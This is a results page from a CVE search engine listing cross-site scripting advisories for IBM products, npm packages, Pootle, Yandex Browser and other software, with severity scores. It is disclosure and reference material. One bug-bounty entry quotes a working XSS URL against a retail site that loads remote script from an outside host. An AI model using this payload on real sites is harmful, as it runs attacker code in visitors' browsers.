CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

3290 matches found

OSV•added 2017/02/01 8:59 p.m.•2 views

CVE-2016-6123

IBM Kenexa LMS on Cloud 13.1 and 13.2 - 13.2.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session...

5.4CVSS5.5AI score

Exploits0References2

OSV•added 2017/02/01 8:59 p.m.•2 views

CVE-2016-6039

IBM Jazz Reporting Service JRS is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session...

5.4CVSS5.4AI score0.0054EPSS

Exploits0References2

OSV•added 2017/02/01 8:59 p.m.•3 views

CVE-2016-5980

IBM TRIRIGA Application Platform is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session...

5.4CVSS5.4AI score

Exploits0References2

OSV•added 2017/02/01 8:59 p.m.•5 views

CVE-2016-2939

IBM iNotes is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session...

6.1CVSS5.4AI score0.00961EPSS

Exploits0References3

CVE•added 2017/02/01 8:0 p.m.•49 views

CVE-2016-6030

Concrete details found: CVE-2016-6030 affects IBM Jazz Foundation (Jazz/CLM family). The vulnerability is a cross-site scripting flaw in the Web UI that can let an attacker embed arbitrary JavaScript code, potentially leading to credentials disclosure within a trusted session. Affected products/v...

5.4CVSS5.2AI score0.0054EPSS

Exploits0References2Affected Software1

Veracode•added 2017/01/27 4:9 a.m.•23 views

Cross-site Scripting (XSS)

marked is vulnerable to cross-site scripting XSS attacks. A malicious user can inject and execute arbitrary javascript via the linking function...

6.1CVSS6.5AI score0.01512EPSS

Exploits1References4Affected Software1

CNVD•added 2017/01/17 12:0 a.m.•0 views

IBM iNotes Cross-Site Scripting Vulnerability

IBM iNotes also known as IBM Lotus iNotes is the United States IBM's set of Web-based e-mail software. A cross-site scripting vulnerability exists in IBM iNotes. An attacker can exploit the vulnerability to inject arbitrary JavaScript code into the Web UI...

6.1CVSS6.4AI score0.00961EPSS

Exploits0References1

Cvelist•added 2017/01/10 3:0 p.m.•21 views

CVE-2015-4591

eClinicalWorks Population Health CCMR suffers from a cross site scripting vulnerability in login.jsp which allows remote unauthenticated users to inject arbitrary javascript via the strMessage parameter...

6.4AI score0.05132EPSS

Exploits5References3

Veracode•added 2016/12/21 6:19 a.m.•11 views

Cross-Site Scripting (XSS)

swagger-ui is vulnerable to cross-site scripting XSS attacks. A malicious user can inject and execute arbitrary javascript by preappending a tag infront of the arbitrary javascript...

6.1AI score

Exploits0

Veracode•added 2016/12/20 7:35 a.m.•11 views

Cross-Site Scripting (XSS)

gon is vulnerable to cross-site scripting XSS attacks. A malicious user can inject and execute arbitrary javascript when prepended with certain unicode characters...

6.1AI score

Exploits0

Veracode•added 2016/12/09 6:16 a.m.•11 views

Cross-Site Scripting (XSS)

django-meta is vulnerable to cross-site scripting XSS attacks. A malicious user can inject and execute arbitrary javascript due to the lack of escaping values before rendering...

6.1AI score

Exploits0

Prion•added 2016/10/26 6:59 p.m.•16 views

Code injection

XSS in Yandex Browser Translator in Yandex browser for desktop for versions from 15.12 to 16.2 could be used by remote attacker for evaluation arbitrary javascript code...

4.3CVSS6.4AI score0.0085EPSS

Exploits0References2Affected Software1

OpenVAS•added 2016/10/26 12:0 a.m.•23 views

Pootle Server < 2.7.3 Multiple XSS Vulnerabilities

Pootle server is prone to multiple cross-site scripting XSS vulnerabilities. Copyright C 2016 Greenbone Networks GmbH Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-or-later This program is...

6.7AI score

Exploits0References1

CNVD•added 2016/09/21 12:0 a.m.•3 views

IBM Tealeaf Customer Experience Cross-Site Scripting Vulnerability (CNVD-2016-07822)

IBM Tealeaf Customer Experience is a SaaS Software-as-a-Service based analytics solution for web and mobile applications from IBM, USA. The solution helps clients improve the overall user experience by analyzing and understanding data, and supports the adoption of advanced user interfaces for ric...

5.4CVSS6.2AI score0.00615EPSS

Exploits0References1

Hacker One•added 2016/09/07 10:51 p.m.•16 views

WebSummit: Reflected xss on websummit.net

Hey guys, TL;DR: Reflected XSS on websummit.net/attendees/featured-attendees as the q parameter is directly reflecting special characters in the data-url on the handlebars template section of the page, as opposed to URL encoding them. Proof of Concept: Visit...

1.4AI score

Exploits0

Openbugbounty•added 2016/09/04 12:37 p.m.•8 views

mediamarkt.gr XSS vulnerability

Vulnerable URL: http://www.mediamarkt.gr/el/search.html?storeId=48353=-3=onlineshop=mmdede===test%27;mcs.jQuery.getScript%22//loshackers.de/a.js%22;%27a%27:%27b Details: Description| Value ---|--- Patched:| No Latest check for patch:| 30.07.2017 Vulnerability type:| XSS Vulnerability status:|...

6.3AI score

Exploits0

CNVD•added 2016/08/24 12:0 a.m.•1 views

IBM Connections Cross-Site Scripting Vulnerability (CNVD-2016-06646)

IBM Connections is a suite of social software platforms from IBM in the United States. The platform provides advanced analytics and real-time data monitoring capabilities, and accelerates web collaboration within and outside the organization through IBM SmartCloud services. A cross-site scripting...

5.4CVSS6.3AI score0.00802EPSS

Exploits0References1

CNVD•added 2016/08/22 12:0 a.m.•2 views

IBM Connections Cross-Site Scripting Vulnerability (CNVD-2016-06535)

5.4CVSS6.2AI score0.00642EPSS

Exploits0References1

CNVD•added 2016/08/22 12:0 a.m.•1 views

IBM Connections Cross-Site Scripting Vulnerability (CNVD-2016-06536)

5.4CVSS6.2AI score0.00615EPSS

Exploits0References1

Node.js•added 2016/08/01 4:36 p.m.•33 views

Cross-Site Scripting

Overview Affected versions of sanitize-html do not sanitize input recursively, which may allow an attacker to execute arbitrary Javascript. Recommendation Update to version 1.4.3 or later. References - Issue 29 - GitHub Advisory...

4.3CVSS6.1AI score0.0084EPSS

Exploits0Affected Software1

Rows per page

Query Builder

Family

Bulletin Type

Min CVSS Score

Date

Order by